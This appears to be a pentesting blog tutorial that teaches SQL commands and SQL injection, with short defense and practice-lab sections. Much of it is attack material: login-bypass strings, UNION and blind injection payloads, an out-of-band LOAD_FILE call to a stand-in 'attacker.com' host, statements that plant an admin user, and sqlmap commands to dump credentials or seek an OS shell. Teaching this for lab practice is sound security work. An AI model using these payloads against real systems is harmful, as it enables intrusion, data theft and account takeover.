Leave a Comment / Foundational-Knowledge, Uncategorized / By

SQL for Pentesters: Commands, Techniques, and Injection Tactics

Understanding SQL (Structured Query Language) is non-negotiable for any serious pentester. Whether you’re hunting for SQL injection vulnerabilities or reviewing database misconfigurations, having a strong grasp of SQL will help you exploit weaknesses with precision — and understand what you’re breaking into.

This guide teaches you what SQL is, why it matters in pentesting, and all the key commands, queries, and injection tricks you need to know — with practical comments on what each line actually does.

Table of Contents

  1. What Is SQL and Why It Matters
  2. Common Database Management Systems (DBMS)
  3. Key SQL Commands for Pentesters
  4. SQL Injection (SQLi) Overview
  5. Manual SQLi — Examples & Techniques
  6. Using SQLMap
  7. Bypassing Login Forms
  8. Extracting Data via SQLi
  9. Out-of-Band and Blind SQLi
  10. Tips for Enumeration & Fingerprinting
  11. Defenses You Should Know
  12. Labs to Practice

1. What Is SQL and Why It Matters

SQL is the language databases speak — it’s used to create, read, update, and delete data (CRUD operations).

As a pentester, SQL matters because:

  • Most web apps interact with a database.
  • Input fields may not sanitize user input.
  • SQL Injection is still a Top 10 OWASP vulnerability.

2. Common Database Management Systems (DBMS)

DBMSNotes
MySQLPopular in web apps (e.g., WordPress, Joomla)
MSSQLMicrosoft SQL Server, integrated with Windows
PostgreSQLFeature-rich, used in enterprise environments
OracleSeen in corporate and government networks
SQLiteEmbedded in applications and mobile apps

Each uses its own SQL dialect — recognize them during engagement.

3. Important SQL Commands for Pentesters

Discovering and Selecting Databases

SHOW DATABASES;
# List all databases on the server (MySQL)

USE target_database;
# Switch to a specific database (MySQL, PostgreSQL)

SHOW TABLES;
# List all tables in the selected database (MySQL)

SELECT table_name FROM information_schema.tables
WHERE table_schema = 'public';
# PostgreSQL: List all tables in the current schema

SELECT table_name FROM all_tables;
# Oracle: List all tables accessible to the user

Exploring Table Structure

DESCRIBE users;
# Show the structure of a table (columns, data types) in MySQL

SELECT column_name
FROM information_schema.columns
WHERE table_name = 'users';
# Generic SQL for finding column names (works across many DBMS)

Extracting and Manipulating Data

SELECT * FROM users;
# Select all data from the 'users' table

SELECT username, password_hash FROM users;
# Retrieve specific fields (useful for credential dumps)

INSERT INTO users (username, password_hash, role)
VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'admin');
# Insert a new admin user — classic privilege escalation (MD5 hash of 'password')

UPDATE users
SET role = 'admin'
WHERE username = 'jdoe';
# Update a user's role to admin

UPDATE users
SET password_hash = '098f6bcd4621d373cade4e832627b4f6'
WHERE username = 'guest';
# Change the password hash for a user (MD5 of 'test')

DELETE FROM users
WHERE username = 'victim';
# Delete a user account (destructive if misused)

INSERT INTO auth_tokens (user_id, token, expires_at)
VALUES (1, 'abcdef1234567890', NOW() + INTERVAL 1 DAY);
# Insert a fake session token (useful in token-based auth bypass)

INSERT INTO logs (user_id, action, timestamp)
VALUES (1, 'Accessed admin panel', NOW());
# Insert an activity log (could expose admin activity if viewed)

Filtering & Searching

SELECT * FROM users WHERE username = 'admin';
# Fetch user with the username 'admin'

SELECT * FROM users WHERE username LIKE '%min%';
# Search for usernames containing 'min'

Aggregation

SELECT COUNT(*) FROM users;
# Count the total number of users

SELECT AVG(age) FROM employees;
# Calculate the average age of employees

Joins

SELECT u.username, o.order_id
FROM users u
JOIN orders o ON u.id = o.user_id;
# Combine user info with their orders

Schema & Column Discovery

SHOW TABLES;
# List all tables in the current database (MySQL)

SELECT name FROM sqlite_master WHERE type='table';
# List all tables in SQLite

SELECT table_name FROM information_schema.tables
WHERE table_schema='public';
# List PostgreSQL tables in the public schema

DESCRIBE users;
# Show columns and types in 'users' table (MySQL)

SELECT column_name
FROM information_schema.columns
WHERE table_name = 'users';
# List column names from 'users' table

4. SQL Injection (SQLi) Overview

SQLi is when unvalidated user input ends up inside an SQL query.

http://site.com/page?id=1' OR '1'='1

SQLi Types:

  • Classic/Union-based
  • Blind (Boolean or Time-based)
  • Out-of-Band (OOB)

5. Manual SQLi Examples

?id=1' --
# Ends query early to test for injection

' OR '1'='1' --
# Always true condition bypasses login

admin' --
# Ends query after username field

?id=1' UNION SELECT null, version(), user()-- -
# Retrieve DB version and user info

?id=1' AND SLEEP(5)-- -
# Delay confirms injection via time-based testing

UNION SELECT table_name, null
FROM information_schema.tables
WHERE table_schema=database()--
# Extract table names from current DB

6. Using SQLMap Like a Pro

sqlmap -u "http://target.com/page.php?id=1" --dbs
# List databases

sqlmap -u "http://target.com/page.php?id=1" -D users --tables
# List tables in 'users' DB

sqlmap -u "http://target.com/page.php?id=1" -D users -T credentials --dump
# Dump 'credentials' table

sqlmap -u "http://target.com/page.php?id=1" --os-shell
# Try to get OS shell access

sqlmap -u "http://target.com/page.php?id=1" --passwords
# Dump DBMS user passwords

7. Bypassing Login Forms

' OR 1=1--
# Always true, bypasses login

' OR '' = ''--
# Empty string comparison bypass

admin'--
# Comment out password check

8. Extracting Data via SQLi

' UNION SELECT 1, username, password FROM users-- -
# Dump usernames and passwords

ORDER BY 3 --
# Test how many columns are returned

9. Blind & Out-of-Band SQLi

?id=1 AND 1=1 --
# Should return normal page

?id=1 AND 1=2 --
# Should return error/different response

' IF (1=1) WAITFOR DELAY '0:0:5'--
# MSSQL: 5-second delay confirms injection

'; SELECT LOAD_FILE('\\attacker.com\abc')--
# OOB: triggers DNS request to attacker box

10. Fingerprinting & Enumeration

SELECT version();
# MySQL/PostgreSQL version

SELECT @@version;
# MSSQL version

SELECT banner FROM v$version;
# Oracle version info

?id=1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(version(), FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y)-- -
# Error-based injection to leak DB version

11. Defenses Pentesters Should Understand

  • Parameterized Queries (Prepared Statements)
  • Input Validation & Whitelisting
  • Stored Procedures (if secure)
  • Web Application Firewalls (WAF)
  • Least Privilege for DB users

You’ll also need filter evasion skills:

  • Inline comments
  • URL encoding
  • Case manipulation

12. Labs to Practice

  • TryHackMe: SQLi Fundamentals
  • PortSwigger Labs
  • HackTheBox Academy
  • DVWA/bWAPP on local VM

Final Words

SQL is one of the most important tools in your offensive toolbox. It’s not just for exploiting websites — it’s for understanding them. Learn to read SQL like a language, and write it like a weapon.

“He who controls the query controls the data. He who controls the data controls the kingdom.”

Related Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top